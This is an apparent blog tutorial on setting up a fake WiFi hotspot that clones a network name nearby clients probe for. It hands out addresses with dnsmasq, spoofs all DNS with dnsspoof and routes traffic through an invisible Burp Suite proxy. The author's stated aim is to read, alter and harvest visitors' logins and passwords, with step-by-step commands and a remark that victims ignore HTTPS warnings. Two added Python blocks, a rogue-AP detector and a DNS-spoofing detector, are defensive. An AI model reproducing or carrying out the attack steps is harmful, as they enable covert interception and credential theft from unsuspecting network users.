--[ MITM WiFi Honeypot ]

We will create a fake WiFi hotspot so that clients connect to it, we can see what they are up to, and we can log everything they browse to through the hotspot.
You will act as a WiFi hotspot providing Internet access. You are able to monitor those who connect to it and forward their traffic to the real server, acting as a man-in-the-middle. You can intercept just about all of the data, or modify it to your needs, before forwarding it to the real server.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET]

What do you need?
  1. Linux OS; Kali
  2. WiFi adapter that supports hosted network
  3. Internet
If you have Kali Linux, or even BackTrack, or any distribution which has the aircrack-ng suite of tools, then you are good. Otherwise you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type

apt-get update
apt-get install aircrack-ng 

NOTE: Even Kali and BackTrack users, I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd] and install it once again even if it is already installed.

Next you need dnsmasq. To get it, type

apt-get install dnsmasq
Now you are ready. Let's start.

Setting Up

First we need to gather some information. Plug in your USB WiFi adapter if you have one, and in the terminal / console type

ifconfig

You should see something like this on your screen:

[screenshot of the ifconfig output]

There you will see wlan0, or even wlan1 [if you have an extra WiFi adapter]. Take note of what you have and then type
  
airmon-ng start wlan0
or
airmon-ng start wlan1

depending on what you have. You should see "(monitor mode enabled on mon0)".

Now that's done, let's proceed.
Next we need to monitor the airwaves to get the names of the WiFi access points the clients are trying to connect to. To do that, type

airodump-ng mon0

You should be able to see a few clients, and under PROBE you will find the name of the access point each client is trying to connect to. In this example we see that the client is searching for the WiFi access point named achutetech.

So we will create a fake AP with the name achutetech and try to make the client connect to us. To do this we type

airbase-ng --essid achutetech mon0

In our example we see this:

[screenshot of the airbase-ng output]

We have successfully managed to create a fake AP, and a client was also successfully associated with our fake AP. But the client will still not be fully connected to our AP, since we haven't provided it with an IP address. To do so we use dnsmasq.
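The fake AP created above advertises a known ESSID from a different BSSID, and with no encryption. From the defender's side that is exactly what a rogue-AP check looks for. The following Python is an added example, not code from the original post: it parses airodump-ng's CSV output (the header is the one airodump-ng writes; the three rows and the inventory of legitimate access points are constructed for this example, reusing the ESSID achutetech from the post) and flags any network that reuses one of our ESSIDs from an unknown BSSID or with different security than the inventory records.

```python
"""Rogue-AP check over airodump-ng CSV output (added example, not from the post)."""
import csv
import io
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanRow:
    bssid: str
    essid: str
    privacy: str  # as airodump-ng prints it: OPN, WEP, WPA, WPA2 ...


# Constructed scan: the header is the one airodump-ng writes to its CSV
# file; the three rows are made up for this example. The second row is
# what a soft AP cloning "achutetech" looks like from the outside: same
# ESSID, a BSSID we do not own, no encryption.
AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-07-01 10:00:00, 2013-07-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0. 0. 0. 0, 10, achutetech,
02:0F:B5:AA:BB:CC, 2013-07-01 10:03:00, 2013-07-01 10:05:00, 6, 54, OPN, , , -30, 80, 0, 0. 0. 0. 0, 10, achutetech,
66:77:88:99:AA:BB, 2013-07-01 10:00:00, 2013-07-01 10:05:00, 1, 54, OPN, , , -70, 40, 0, 0. 0. 0. 0, 10, coffeeshop,
"""

# Constructed inventory of the access points we legitimately operate.
KNOWN_APS = {
    "achutetech": {"bssids": {"00:11:22:33:44:55"}, "privacy": "WPA2"},
}


def parse_airodump_csv(text):
    """Parse the AP section of an airodump-ng CSV into ScanRow objects."""
    rows = []
    header = None
    for raw in csv.reader(io.StringIO(text)):
        fields = [f.strip() for f in raw]
        if not any(fields):
            continue  # blank separator line
        if header is None:
            header = fields
            continue
        if len(fields) < len(header):
            continue  # truncated line or a row from the station section
        rec = dict(zip(header, fields))
        rows.append(ScanRow(rec["BSSID"].upper(), rec["ESSID"], rec["Privacy"]))
    return rows


def find_rogue_aps(rows, known=KNOWN_APS):
    """Return (bssid, essid, reasons) for rows that impersonate a known ESSID."""
    findings = []
    for row in rows:
        expected = known.get(row.essid)
        if expected is None:
            continue  # not one of our networks; nothing to compare against
        reasons = []
        if row.bssid not in {b.upper() for b in expected["bssids"]}:
            reasons.append("unknown BSSID advertising our ESSID")
        if row.privacy != expected["privacy"]:
            reasons.append(f"security differs: saw {row.privacy}, expected {expected['privacy']}")
        if reasons:
            findings.append((row.bssid, row.essid, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for bssid, essid, reasons in find_rogue_aps(parse_airodump_csv(AIRODUMP_CSV)):
        print(f"{bssid} ({essid}): {'; '.join(reasons)}")
```

Run it against the CSV that airodump-ng writes when started with -w; the inventory of BSSIDs and expected security would normally come from your wireless controller or asset list rather than a literal in the script.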

Note: I have tried using dhcpd or dnsserver3, but they seem to be error-prone while configuring them and I was getting errors like "Interface name is too long" and so on, so I switched to dnsmasq and it seems to work great :D
  
To verify that we have dnsmasq, type
 

whereis dnsmasq

and to see whether we have the configuration file or not [I have noticed that even though dnsmasq was installed on Kali OS it didn't have the dnsmasq.conf file, so to get it type apt-get install dnsmasq]

and to verify that we have the config file, type

ls /etc/ | grep dnsmasq

If dnsmasq.conf is returned then all is well and good. But if not, try

apt-get install dnsmasq

OK, now that we have dnsmasq we need to configure a few things. Type

vim /etc/dnsmasq.conf

[How to use vim - I will be writing a quick tutorial on it soon]
Now scroll down to around line 90. You should see

# interface=

change it to

interface=at0

// at0 is the interface on which our fake AP lives

Now scroll down even further, to line 141. You should see

#dhcp-range=192.168.0.50,192.168.0.150,12h

just remove the #

and you are good to go :D

Now we have to assign an IP address to your router [i.e. the fake AP].

to do so type

ifconfig at0 192.168.0.1 up

and to start the DHCP service, type

dnsmasq

Now your clients should be able to get an IP address for themselves.


OK, so we have created the fake AP, our client is connected to us and we have supplied them with addresses from our DHCP pool. With all this done, let's begin the FUN part.

What will we be doing?

We will be doing DNS spoofing, that is, we will forward all of our client's requests to our own computer so that we can monitor the requests, and even modify them if we want to, and get all those details like the sites visited and the usernames and passwords used on those sites, and even modify those requests and responses. Sounds like a lot of fun, so let's get going.

DNS spoofing 

To do DNS spoofing, type

dnsspoof -i at0

What we are doing is forwarding all the DNS requests of our client to our own IP address. We should be able to see something like this:

[screenshot of the dnsspoof output]

Now that's done: we have DNS spoofing running and every client request is being directed to our own IP address. Next we will bind a proxy to our IP address so that we can intercept the traffic, and make it a transparent proxy so that the client can still reach the Internet.
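dnsspoof as run above answers every query with the same address, our own, so from a monitoring point of view the tell-tale sign is many unrelated domains all resolving to one private IP. The following Python is an added example, not code from the original post: it scans a constructed log of (client, queried name, answer) tuples and reports any private address that is being returned for several distinct registrable domains, together with the clients that received it. The log entries, the threshold of three domains and the crude two-label domain extraction are assumptions made for the example.

```python
"""DNS spoofing / sinkhole detector over a resolver answer log (added example, not from the post)."""
import ipaddress
from collections import defaultdict

# Constructed answer log: (client IP, queried name, A-record answer).
# The first four entries show what clients behind a spoofing gateway see:
# every name resolves to the gateway itself, 192.168.0.1. The public
# address on the last line is a made-up sample value.
DNS_LOG = [
    ("192.168.0.50", "www.google.com", "192.168.0.1"),
    ("192.168.0.50", "mail.yahoo.com", "192.168.0.1"),
    ("192.168.0.51", "login.facebook.com", "192.168.0.1"),
    ("192.168.0.51", "cdn.example.net", "192.168.0.1"),
    ("192.168.0.50", "printer.lan", "192.168.0.20"),  # legitimate local host
    ("192.168.0.52", "www.wikipedia.org", "93.184.216.34"),
]


def registrable_domain(name):
    """Crude registrable-domain extraction: the last two labels.

    Assumption for the example; production code would consult the
    public suffix list so that names like example.co.uk group correctly.
    """
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def find_sinkholed_answers(log, min_domains=3):
    """Report private IPs that were returned for at least min_domains distinct domains."""
    domains_by_ip = defaultdict(set)
    clients_by_ip = defaultdict(set)
    for client, qname, answer in log:
        domains_by_ip[answer].add(registrable_domain(qname))
        clients_by_ip[answer].add(client)

    findings = []
    for ip, domains in domains_by_ip.items():
        if len(domains) < min_domains:
            continue
        if not ipaddress.ip_address(ip).is_private:
            continue  # many domains sharing a public CDN address is normal, not our signal
        findings.append({
            "answer": ip,
            "domains": sorted(domains),
            "clients": sorted(clients_by_ip[ip]),
        })
    return findings


if __name__ == "__main__":
    for f in find_sinkholed_answers(DNS_LOG):
        print(f"{f['answer']} answered for {len(f['domains'])} domains "
              f"({', '.join(f['domains'])}) to clients {', '.join(f['clients'])}")
```

In practice the tuples would be built from a resolver query log or from passive DNS capture on the client VLAN; the private-address filter is what keeps ordinary CDN sharing from triggering the check, while a gateway that answers for Google, Yahoo and Facebook at once stands out immediately.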

Note: we must be connected to the Internet for the client to be able to connect to the Internet.

OK, let's start Burp Suite.

Now go to the Proxy tab, then to its Options tab, and click on Add.

Type 80 in the "bind to port" box,
and select your router address, i.e. your at0 address; in our case it is 192.168.0.1.
Then click on the "Request handling" tab and tick the checkbox for "Support invisible proxying".
Click OK and we are done.

Repeat the same with port 443 to handle HTTPS requests :P


Now you can see any request the client makes in the Intercept tab, and you can tamper with it, monitor it, forward it or even drop it. You are the BOSS now :D. You can even get the login IDs and passwords for the different sites the client uses, but while using an HTTPS site the client will get a warning, which most of the time they ignore :D
(http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html)